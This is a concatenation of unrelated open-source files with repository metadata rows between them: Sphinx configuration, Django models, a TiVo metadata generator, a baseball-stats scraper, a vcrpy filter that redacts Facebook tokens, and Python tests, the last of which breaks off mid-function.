# ylength = len(found.group(0))
# return ylength
# return year_strip
#
# def test_year_strip(year_strip):
# y2 = 'dd - mm - YY (Any Order)'
# y4 = 'dd - mm - YYYY (Any Order)'
# ym2 = 'mm - YY (Any Order)'
# ym4 = 'mm - YYYY (Any Order)'
# y = 'YYYY'
# assert (year_strip(y2) == 2) is True
# assert (year_strip(ym2) == 2) is True
# assert (year_strip(ym4) == 4) is True
# assert (year_strip(y4) == 4) is True
# assert (year_strip(y) == 4) is True
#
# @pytest.fixture
# def write_column_to_log(produce_null_df, updated_df_values):
# def write_column_to_log(dictionary, logger, tablename):
# coldf = DataFrame([dictionary])
# nulldf = produce_null_df(
# len(coldf.values.tolist()),
# coldf.columns.values.tolist(),
# len(coldf),
# 'NULL'
# )
#
# updated_df_values(
# nulldf, coldf, logger, tablename
# )
# return write_column_to_log
#
# def test_write_column(write_column_to_log, mylog):
# testdict = {'columnname':'uniquevalue'}
# write_column_to_log(testdict, mylog, 'testtable')
#
# @pytest.fixture
# def date_strip():
# return read_csv('Datasets_manual_test/raw_data_test_dialogsite.csv')
#
# @pytest.fixture
# def date_strip_test5():
# return read_csv('Datasets_manual_test/raw_data_test_5.csv')
#
# @pytest.fixture
# def strip_time():
# '''
# Function to strip a single date time column
# with all potential delimiters (leaving a space
# where the delimiter used to be). This is necessary
# to standardize the data enabling the effective use
# of the pandas as_datetime method.
# '''
# def strip_time(data, col):
# strippedlist = []
# for i in list(set(col)):
# print([
# re.sub("/|,|-|;"," ", x) for x in list(
# data[i].astype(str))])
# strippedlist.append([
# re.sub("/|,|-|;"," ", x) for x in list(
# data[i].astype(str))])
#
# return strippedlist
#
# return strip_time
#
# def test_strip_time(date_strip, strip_time):
# test = strip_time(date_strip, ['DATE'])
# assert isinstance(test, list) is True
#
# def test_strip_time_test5(date_strip_test5, strip_time):
# Single columns are going to give back nested list
# test = strip_time(date_strip_test5, ['YEAR'])
# print(test)
# assert isinstance(test, list) is True
#
# @pytest.fixture
# def string_to_list():
# def string_to_list(userinput):
# strtolist = re.sub(
# ",\s", " ", userinput.rstrip()).split()
# return strtolist
#
# return string_to_list
#
# def test_string_to_list(string_to_list):
# teststring = 'DEPTH, REP, TEMP'
# test = string_to_list(teststring)
# print(test)
# assert isinstance(test, list) is True
| mit | -2,347,585,119,337,659,000 | 31.090909 | 74 | 0.538462 | false |
wglass/kiel | docs/conf.py | 1 | 10537 | # -*- coding: utf-8 -*-
#
# kiel documentation build configuration file, created by
# sphinx-quickstart on Wed Dec 23 16:22:07 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
import sphinx_bootstrap_theme # noqa
import kiel # noqa
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.extlinks',
]
if not on_rtd:
extensions.append("sphinxcontrib.spelling")
# Add any paths that contain templates here, relative to this directory.
templates_path = ['templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'kiel'
copyright = u'2015-2016, William Glass'
author = u'William Glass'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
version = release = kiel.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
autodoc_member_order = "bysource"
autoclass_content = "both"
autodoc_docstring_signature = False
coverage_skip_undoc_in_source = True
coverage_ignore_modules = []
spelling_word_list_filename = "spelling_wordlist.txt"
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
default_role = "py:obj"
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'trac'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['static']
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
html_theme = 'bootstrap'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"navbar_links": [
("Clients", "clients"),
("Release Notes", "releases"),
("Source Docs", "source_docs"),
],
'navbar_class': "navbar",
"navbar_site_name": "Site",
"globaltoc_depth": 2,
"globaltoc_includehidden": False,
"navbar_sidebarrel": False,
"navbar_pagenav": True,
"source_link_position": None,
"bootswatch_theme": "paper",
"bootstrap_version": "3",
}
# Add any paths that contain custom themes here, relative to this directory.
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {
# '**': [
# 'about.html', 'navigation.html', 'searchbox.html', 'donate.html',
# ]
# }
extlinks = {
"current_tarball": (
(
"https://pypi.python.org/packages/source/" +
"k/kiel/kiel-%s.tar.g%%s" % version
),
"kiel-%s.tar.g" % version
)
}
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'kieldoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
# Latex figure (float) alignment
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
master_doc, 'kiel.tex', u'kiel Documentation',
u'William Glass', 'manual'
),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
master_doc, 'kiel', u'kiel Documentation',
[author], 1
)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc, 'kiel', u'kiel Documentation',
author, 'kiel', 'One line description of project.',
'Miscellaneous'
),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
| apache-2.0 | -5,949,879,600,771,875,000 | 30.082596 | 79 | 0.682452 | false |
sio2project/oioioi | oioioi/contestlogo/models.py | 1 | 1997 | import os.path
from django.db import models
from django.utils import timezone
from django.utils.text import get_valid_filename
from django.utils.translation import ugettext_lazy as _
from oioioi.contests.models import Contest
from oioioi.filetracker.fields import FileField
def make_logo_filename(instance, filename):
return 'logo/%s/%s' % (
instance.contest.id,
get_valid_filename(os.path.basename(filename)),
)
class ContestLogo(models.Model):
contest = models.OneToOneField(
Contest, verbose_name=_("contest"), primary_key=True, on_delete=models.CASCADE
)
image = FileField(upload_to=make_logo_filename, verbose_name=_("logo image"))
updated_at = models.DateTimeField(default=timezone.now)
link = models.URLField(
blank=True, null=True, verbose_name=_("external contest webpage url")
)
def save(self, *args, **kwargs):
self.updated_at = timezone.now()
return super(ContestLogo, self).save(*args, **kwargs)
@property
def filename(self):
return os.path.split(self.image.name)[1]
class Meta(object):
verbose_name = _("contest logo")
verbose_name_plural = _("contest logo")
def make_icon_filename(instance, filename):
return 'icons/%s/%s' % (
instance.contest.id,
get_valid_filename(os.path.basename(filename)),
)
class ContestIcon(models.Model):
contest = models.ForeignKey(
Contest, verbose_name=_("contest"), on_delete=models.CASCADE
)
image = FileField(upload_to=make_icon_filename, verbose_name=_("icon image"))
updated_at = models.DateTimeField(default=timezone.now)
def save(self, *args, **kwargs):
self.updated_at = timezone.now()
return super(ContestIcon, self).save(*args, **kwargs)
@property
def filename(self):
return os.path.split(self.image.name)[1]
class Meta(object):
verbose_name = _("contest icon")
verbose_name_plural = _("contest icons")
| gpl-3.0 | -4,766,905,731,717,114,000 | 29.257576 | 86 | 0.667501 | false |
wimac/home | Dropbox/skel/bin/sick-beard/sickbeard/metadata/tivo.py | 1 | 13268 | # Author: Nic Wolfe <[email protected]>
# Author: Gordon Turner <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of Sick Beard.
#
# Sick Beard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sick Beard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sick Beard. If not, see <http://www.gnu.org/licenses/>.
import datetime
import os
import sickbeard
#from sickbeard.common import *
from sickbeard import logger, exceptions, helpers
from sickbeard.metadata import generic
from sickbeard import encodingKludge as ek
from lib.tvdb_api import tvdb_api, tvdb_exceptions
class TIVOMetadata(generic.GenericMetadata):
"""
Metadata generation class for TIVO
The following file structure is used:
show_root/Season 01/show - 1x01 - episode.avi.txt (* existing episode)
show_root/Season 01/.meta/show - 1x01 - episode.avi.txt (episode metadata)
This class only generates episode specific metadata files, it does NOT generated a default.txt file.
"""
def __init__(self,
show_metadata=False,
episode_metadata=False,
poster=False,
fanart=False,
episode_thumbnails=False,
season_thumbnails=False):
generic.GenericMetadata.__init__(self,
show_metadata,
episode_metadata,
poster,
fanart,
episode_thumbnails,
season_thumbnails)
self._ep_nfo_extension = "txt"
self.generate_ep_metadata = True
self.name = 'TIVO'
self.eg_show_metadata = "<i>not supported</i>"
self.eg_episode_metadata = "Season##\\.meta\\<i>filename</i>.txt"
self.eg_fanart = "<i>not supported</i>"
self.eg_poster = "<i>not supported</i>"
self.eg_episode_thumbnails = "<i>not supported</i>"
self.eg_season_thumbnails = "<i>not supported</i>"
# Override with empty methods for unsupported features.
def create_show_metadata(self, show_obj):
pass
def create_fanart(self, show_obj):
pass
def get_episode_thumb_path(self, ep_obj):
pass
def get_season_thumb_path(self, show_obj, season):
pass
def retrieveShowMetadata(self, dir):
return (None, None)
# Override and implement features for Tivo.
def get_episode_file_path(self, ep_obj):
"""
Returns a full show dir/.meta/episode.txt path for Tivo
episode metadata files.
Note, that pyTivo requires the metadata filename to include the original extention.
ie If the episode name is foo.avi, the metadata name is foo.avi.txt
ep_obj: a TVEpisode object to get the path for
"""
if ek.ek(os.path.isfile, ep_obj.location):
metadata_file_name = ek.ek(os.path.basename, ep_obj.location) + "." + self._ep_nfo_extension
metadata_dir_name = ek.ek(os.path.join, ek.ek(os.path.dirname, ep_obj.location), '.meta')
metadata_file_path = ek.ek(os.path.join, metadata_dir_name, metadata_file_name)
else:
logger.log(u"Episode location doesn't exist: "+str(ep_obj.location), logger.DEBUG)
return ''
return metadata_file_path
def _ep_data(self, ep_obj):
"""
Creates a key value structure for a Tivo episode metadata file and
returns the resulting data object.
ep_obj: a TVEpisode instance to create the metadata file for.
Lookup the show in http://thetvdb.com/ using the python library:
https://github.com/dbr/tvdb_api/
The results are saved in the object myShow.
The key values for the tivo metadata file are from:
http://pytivo.sourceforge.net/wiki/index.php/Metadata
"""
data = "";
eps_to_write = [ep_obj] + ep_obj.relatedEps
tvdb_lang = ep_obj.show.lang
try:
# There's gotta be a better way of doing this but we don't wanna
# change the language value elsewhere
ltvdb_api_parms = sickbeard.TVDB_API_PARMS.copy()
if tvdb_lang and not tvdb_lang == 'en':
ltvdb_api_parms['language'] = tvdb_lang
t = tvdb_api.Tvdb(actors=True, **ltvdb_api_parms)
myShow = t[ep_obj.show.tvdbid]
except tvdb_exceptions.tvdb_shownotfound, e:
raise exceptions.ShowNotFoundException(str(e))
except tvdb_exceptions.tvdb_error, e:
logger.log("Unable to connect to TVDB while creating meta files - skipping - "+str(e), logger.ERROR)
return False
for curEpToWrite in eps_to_write:
try:
myEp = myShow[curEpToWrite.season][curEpToWrite.episode]
except (tvdb_exceptions.tvdb_episodenotfound, tvdb_exceptions.tvdb_seasonnotfound):
logger.log("Unable to find episode " + str(curEpToWrite.season) + "x" + str(curEpToWrite.episode) + " on tvdb... has it been removed? Should I delete from db?")
return None
if myEp["firstaired"] == None and ep_obj.season == 0:
myEp["firstaired"] = str(datetime.date.fromordinal(1))
if myEp["episodename"] == None or myEp["firstaired"] == None:
return None
if myShow["seriesname"] != None:
# Title of the series (The Simpsons, Seinfeld, etc.) or title of the movie (The Mummy, Spiderman, etc).
data += ("title : " + myShow["seriesname"] + "\n")
# Name of series (The Simpsons, Seinfeld, etc.). This should be included if the show is episodic.
# For movies, you may repeat the name of the movie (The Mummy, Spiderman, etc), leave blank, or omit.
data += ("seriesTitle : " + myShow["seriesname"] + "\n")
# Title of the episode (Pilot, Homer's Night Out, Episode 02, etc.) Should be included for episodic shows.
# Leave blank or omit for movies.
data += ("episodeTitle : " + curEpToWrite.name + "\n")
# This should be entered for episodic shows and omitted for movies. The standard tivo format is to enter
# the season number followed by the episode number for that season. For example, enter 201 for season 2
# episode 01.
# This only shows up if you go into the Details from the Program screen.
# This seems to disappear once the video is transferred to TiVo.
# NOTE: May not be correct format, missing season, but based on description from wiki leaving as is.
data += ("episodeNumber : " + str(curEpToWrite.episode) + "\n")
# Must be entered as true or false. If true, the year from originalAirDate will be shown in parentheses
# after the episode's title and before the description on the Program screen.
# FIXME: Hardcode isEpisode to true for now, not sure how to handle movies
data += ("isEpisode : true\n")
# Write the synopsis of the video here.
# Micrsoft Word's smartquotes can die in a fire.
sanitizedDescription = curEpToWrite.description
# Replace double curly quotes
sanitizedDescription = sanitizedDescription.replace(u"\u201c", "\"").replace(u"\u201d", "\"")
# Replace single curly quotes
sanitizedDescription = sanitizedDescription.replace(u"\u2018", "'").replace(u"\u2019", "'").replace(u"\u02BC", "'")
data += ("description : " + sanitizedDescription + "\n")
# Usually starts with "SH" and followed by 6-8 digits.
# Tivo uses zap2it for thier data, so the series id is the zap2it_id.
if myShow["zap2it_id"] != None:
data += ("seriesId : " + myShow["zap2it_id"] + "\n")
# This is the call sign of the channel the episode was recorded from.
if myShow["network"] != None:
data += ("callsign : " + myShow["network"] + "\n")
# This must be entered as yyyy-mm-ddThh:mm:ssZ (the t is capitalized and never changes, the Z is also
# capitalized and never changes). This is the original air date of the episode.
# NOTE: Hard coded the time to T00:00:00Z as we really don't know when during the day the first run happened.
if curEpToWrite.airdate != datetime.date.fromordinal(1):
data += ("originalAirDate : " + str(curEpToWrite.airdate) + "T00:00:00Z\n")
# This shows up at the beginning of the description on the Program screen and on the Details screen.
if myShow["actors"]:
for actor in myShow["actors"].split('|'):
if actor:
data += ("vActor : " + str(actor) + "\n")
# This is shown on both the Program screen and the Details screen. It uses a single digit to determine the
# number of stars: 1 for 1 star, 7 for 4 stars
if myShow["rating"] != None:
try:
rating = float(myShow['rating'])
except ValueError:
rating = 0.0
rating = rating / 10 * 4
data += ("starRating : " + str(rating) + "\n")
# This is shown on both the Program screen and the Details screen.
# It uses the standard TV rating system of: TV-Y7, TV-Y, TV-G, TV-PG, TV-14, TV-MA and TV-NR.
if myShow["contentrating"]:
data += ("tvRating : " + str(myShow["contentrating"]) + "\n")
# This field can be repeated as many times as necessary or omitted completely.
if ep_obj.show.genre:
for genre in ep_obj.show.genre.split('|'):
if genre:
data += ("vProgramGenre : " + str(genre) + "\n")
# NOTE: The following are metadata keywords are not used
# displayMajorNumber
# showingBits
# displayMinorNumber
# colorCode
# vSeriesGenre
# vGuestStar, vDirector, vExecProducer, vProducer, vWriter, vHost, vChoreographer
# partCount
# partIndex
return data
def write_ep_file(self, ep_obj):
"""
Generates and writes ep_obj's metadata under the given path with the
given filename root. Uses the episode's name with the extension in
_ep_nfo_extension.
ep_obj: TVEpisode object for which to create the metadata
file_name_path: The file name to use for this metadata. Note that the extension
will be automatically added based on _ep_nfo_extension. This should
include an absolute path.
"""
data = self._ep_data(ep_obj)
if not data:
return False
nfo_file_path = self.get_episode_file_path(ep_obj)
nfo_file_dir = ek.ek(os.path.dirname, nfo_file_path)
try:
if not ek.ek(os.path.isdir, nfo_file_dir):
logger.log("Metadata dir didn't exist, creating it at "+nfo_file_dir, logger.DEBUG)
ek.ek(os.makedirs, nfo_file_dir)
helpers.chmodAsParent(nfo_file_dir)
logger.log(u"Writing episode nfo file to "+nfo_file_path)
nfo_file = ek.ek(open, nfo_file_path, 'w')
# Calling encode directly, b/c often descriptions have wonky characters.
nfo_file.write( data.encode( "utf-8" ) )
nfo_file.close()
helpers.chmodAsParent(nfo_file_path)
except IOError, e:
logger.log(u"Unable to write file to "+nfo_file_path+" - are you sure the folder is writable? "+str(e).decode('utf-8'), logger.ERROR)
return False
return True
# present a standard "interface"
metadata_class = TIVOMetadata
| gpl-2.0 | 3,020,361,615,287,338,500 | 40.85489 | 176 | 0.562632 | false |
jldbc/pybaseball | pybaseball/team_fielding.py | 1 | 2821 | import warnings
import pandas as pd
import requests
from bs4 import BeautifulSoup, Comment
from . import cache
from .datahelpers import postprocessing
from .datasources.fangraphs import fg_team_fielding_data
# This is just a pass through for the new, more configurable function
team_fielding = fg_team_fielding_data
@cache.df_cache()
def team_fielding_bref(team, start_season, end_season=None):
"""
Get season-level Fielding Statistics for Specific Team (from Baseball-Reference)
ARGUMENTS:
team : str : The Team Abbreviation (i.e., 'NYY' for Yankees) of the Team you want data for
start_season : int : first season you want data for (or the only season if you do not specify an end_season)
end_season : int : final season you want data for
"""
if start_season is None:
raise ValueError(
"You need to provide at least one season to collect data for. " +
"Try team_fielding_bref(season) or team_fielding_bref(start_season, end_season)."
)
if end_season is None:
end_season = start_season
url = "https://www.baseball-reference.com/teams/{}".format(team)
data = []
headings = None
for season in range(start_season, end_season+1):
stats_url = "{}/{}-fielding.shtml".format(url, season)
response = requests.get(stats_url)
soup = BeautifulSoup(response.content, 'html.parser')
fielding_div = soup.find('div', {'id': 'all_standard_fielding'})
comment = fielding_div.find(
string=lambda text: isinstance(text, Comment))
fielding_hidden = BeautifulSoup(comment.extract(), 'html.parser')
table = fielding_hidden.find('table')
thead = table.find('thead')
if headings is None:
headings = [row.text.strip()
for row in thead.find_all('th')]
rows = table.find('tbody').find_all('tr')
for row in rows:
cols = row.find_all(['td', 'th'])
cols = [ele.text.strip() for ele in cols]
# Removes '*' and '#' from some names
cols = [col.replace('*', '').replace('#', '') for col in cols]
# Removes Team Totals and other rows
cols = [
col for col in cols if 'Team Runs' not in col
]
cols.insert(2, season)
data.append(cols)
headings.insert(2, "Year")
data = pd.DataFrame(data=data, columns=headings)
data = data.dropna() # Removes Row of All Nones
postprocessing.coalesce_nulls(data)
postprocessing.convert_percentages(data, ['CS%', 'lgCS%'])
postprocessing.convert_numeric(
data,
postprocessing.columns_except(
data,
['Team', 'Name', 'Pos\xa0Summary']
)
)
return data
| mit | 4,591,668,430,960,663,000 | 32.583333 | 115 | 0.609358 | false |
agriffis/vcrpy-facebook | vcr_facebook/request.py | 1 | 4164 | from __future__ import absolute_import, unicode_literals, print_function
import hashlib
import logging
import re
import zlib
from .compat import OrderedDict, parse_qsl, quote
from .filters import (make_batch_relative_url_filter, make_multipart_filter, make_query_filter,
make_url_filter, make_elider_filter)
from .util import always_return
logger = logging.getLogger(__name__)
def wrap_before_record(wrapped, **kwargs):
before_record = make_before_record(**kwargs)
def wrapper(request):
request = before_record(request)
request = wrapped(request)
return request
return wrapper
def make_before_record(elide_appsecret_proof,
elide_access_token,
elide_client_secret,
elider_prefix):
appsecret_proof_filter = make_elider_filter(
'appsecret_proof',
elide_appsecret_proof and (
lambda q: elide_appsecret_proof(q['appsecret_proof'],
q['access_token'])),
elider_prefix,
)
access_token_filter = make_elider_filter(
'access_token',
elide_access_token and (
lambda q: elide_access_token(q['access_token'])),
elider_prefix,
)
input_token_filter = make_elider_filter(
'input_token',
elide_access_token and (
lambda q: elide_access_token(q['input_token'])),
elider_prefix,
)
client_secret_filter = make_elider_filter(
'client_secret',
elide_client_secret and (
lambda q: elide_client_secret(q['client_secret'])),
elider_prefix,
)
def _filter_body(body):
filters = [
make_multipart_filter(filter_uploads),
make_batch_relative_url_filter(appsecret_proof_filter),
make_batch_relative_url_filter(access_token_filter),
make_batch_relative_url_filter(input_token_filter),
make_batch_relative_url_filter(client_secret_filter),
make_query_filter(appsecret_proof_filter),
make_query_filter(access_token_filter),
make_query_filter(input_token_filter),
make_query_filter(client_secret_filter),
make_multipart_filter(appsecret_proof_filter),
make_multipart_filter(access_token_filter),
make_multipart_filter(input_token_filter),
make_multipart_filter(client_secret_filter),
]
for f in filters:
body = f(body)
return body
def _filter_headers(headers):
if 'content-length' in headers:
del headers['content-length']
return headers
def _filter_url(url):
filters = [
make_url_filter(appsecret_proof_filter),
make_url_filter(access_token_filter),
make_url_filter(client_secret_filter),
]
for f in filters:
url = f(url)
return url
def before_record(request):
if request.host != 'graph.facebook.com':
return request
request.body = _filter_body(request.body)
request.headers = _filter_headers(request.headers)
request.uri = _filter_url(request.uri)
request = filter_multipart_boundary(request)
return request
return before_record
def filter_uploads(parts):
for p in parts:
if b'; filename="' in p.header and len(p.content) > 100:
p.content = hashlib.md5(p.content).hexdigest()
return parts
MULTIPART_BOUNDARY = b'xxBOUNDARY' * 10
def filter_multipart_boundary(request):
content_type = request.headers.get('content-type', '')
prefix, equals, boundary = content_type.partition('=')
if boundary and prefix == 'multipart/form-data; boundary':
boundary = MULTIPART_BOUNDARY[:len(boundary)]
request.headers['content-type'] = b'{0}={1}'.format(prefix, boundary)
def filter(parts):
assert len(parts.boundary) == len(boundary)
parts.boundary = boundary
return parts
request.body = make_multipart_filter(filter)(request.body)
return request
| mit | -3,190,449,575,350,943,000 | 32.047619 | 95 | 0.60879 | false |
HewlettPackard/oneview-ansible | test/test_hpe_icsp_server.py | 1 | 10504 | #!/usr/bin/python
# -*- coding: utf-8 -*-
###
# Copyright (2016-2017) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
import mock
import json
import pytest
import yaml
from oneview_module_loader import ICspHelper
from hpe_icsp_server import (ICspServerModule,
main as hpe_icsp_server_main)
from hpICsp.exceptions import HPICspInvalidResource
MODULE_NAME = 'hpe_icsp_server'
SERVER_IP = "16.124.135.239"
YAML_SERVER_PRESENT = """
state: present
api_version: 300
icsp_host: "16.124.133.245"
username: "Administrator"
password: "admin"
server_ipAddress: "16.124.135.239"
server_username: "Admin"
server_password: "serveradmin"
server_port: 443
"""
YAML_SERVER_ABSENT = """
state: absent
api_version: 300
icsp_host: "16.124.133.251"
username: "Administrator"
password: "admin"
server_ipAddress: "16.124.135.239"
"""
YAML_NETWORK_CONFIGURED = """
state: network_configured
api_version: 300
icsp_host: "16.124.133.245"
username: "Administrator"
password: "admin"
server_ipAddress: "16.124.135.239"
server_username: "Admin"
server_password: "serveradmin"
server_port: 443
server_personality_data:
network_config:
hostname: "test-web.io.fc.hpe.com"
domain: "demo.com"
interfaces:
- macAddress: "01:23:45:67:89:ab"
enabled: true
dhcpv4: false
ipv6Autoconfig:
dnsServers:
- "16.124.133.2"
staticNetworks:
- "16.124.133.39/255.255.255.0"
vlanid: -1
ipv4gateway: "16.124.133.1"
ipv6gateway:
virtualInterfaces:
"""
DEFAULT_SERVER = {"name": "SP-01", "uri": "/uri/239", "ilo": {"ipAddress": SERVER_IP}}
SERVER_ADDED = {"name": "SP-03", "uri": "/uri/188", "ilo": {"ipAddress": "16.124.135.188"}}
SERVERS = {
"members": [
DEFAULT_SERVER,
{"name": "SP-02", "uri": "/uri/233", "ilo": {"ipAddress": "16.124.135.233"}}
]
}
CONNECTION = {}
ICSP_JOBS = {}
JOB_RESOURCE = {"uri": "/rest/os-deployment-jobs/123456"}
class TestIcspServer():
@pytest.fixture(autouse=True)
def setUp(self):
self.patcher_ansible_module = mock.patch(MODULE_NAME + '.AnsibleModule')
self.mock_ansible_module = self.patcher_ansible_module.start()
self.mock_ansible_instance = mock.Mock()
self.mock_ansible_module.return_value = self.mock_ansible_instance
self.patcher_icsp_service = mock.patch(MODULE_NAME + '.hpICsp')
self.mock_icsp = self.patcher_icsp_service.start()
self.mock_connection = mock.Mock()
self.mock_connection.login.return_value = CONNECTION
self.mock_icsp.connection.return_value = self.mock_connection
self.mock_server_service = mock.Mock()
self.mock_icsp.servers.return_value = self.mock_server_service
yield
self.patcher_ansible_module.stop()
self.patcher_icsp_service.stop()
def test_should_not_add_server_when_already_present(self):
self.mock_connection.get.return_value = SERVERS
self.mock_ansible_instance.params = yaml.load(YAML_SERVER_PRESENT)
ICspServerModule().run()
self.mock_ansible_instance.exit_json.assert_called_once_with(
changed=False,
msg=ICspServerModule.SERVER_ALREADY_PRESENT,
ansible_facts=dict(target_server=DEFAULT_SERVER)
)
def test_should_add_server(self):
self.mock_connection.get.side_effect = [{'members': []}, SERVERS]
self.mock_server_service.add_server.return_value = JOB_RESOURCE
self.mock_icsp.jobs.return_value = ICSP_JOBS
self.mock_icsp.common = mock.Mock()
self.mock_icsp.common.monitor_execution.return_value = {}
self.mock_ansible_instance.params = yaml.load(YAML_SERVER_PRESENT)
hpe_icsp_server_main()
ilo_body = {'ipAddress': "16.124.135.239",
'username': "Admin",
'password': "serveradmin",
'port': 443}
self.mock_server_service.add_server.assert_called_once_with(ilo_body)
self.mock_icsp.common.monitor_execution.assert_called_once_with(JOB_RESOURCE, ICSP_JOBS)
self.mock_ansible_instance.exit_json.assert_called_once_with(
changed=True,
msg="Server created: '/uri/239'",
ansible_facts=dict(target_server=DEFAULT_SERVER)
)
def test_expect_exception_not_caught_when_create_server_raise_exception(self):
self.mock_connection.get.side_effect = [{'members': []}, SERVERS]
self.mock_server_service.add_server.side_effect = Exception("message")
self.mock_ansible_instance.params = yaml.load(YAML_SERVER_PRESENT)
try:
ICspServerModule().run()
